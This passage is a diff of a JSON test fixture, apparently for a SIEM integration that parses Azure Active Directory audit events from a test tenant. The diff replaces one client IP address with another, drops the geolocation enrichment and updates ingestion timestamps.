testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125302100Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -16820,25 +15362,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -16852,7 +15376,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -16975,7 +15499,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -16987,12 +15511,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036527900Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125306400Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -17018,25 +15542,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -17050,7 +15556,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -17186,7 +15692,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -17198,12 +15704,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036532100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8071361Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622707\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"256e3859-87ca-4b23-b2c0-45a26ccd7925\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service 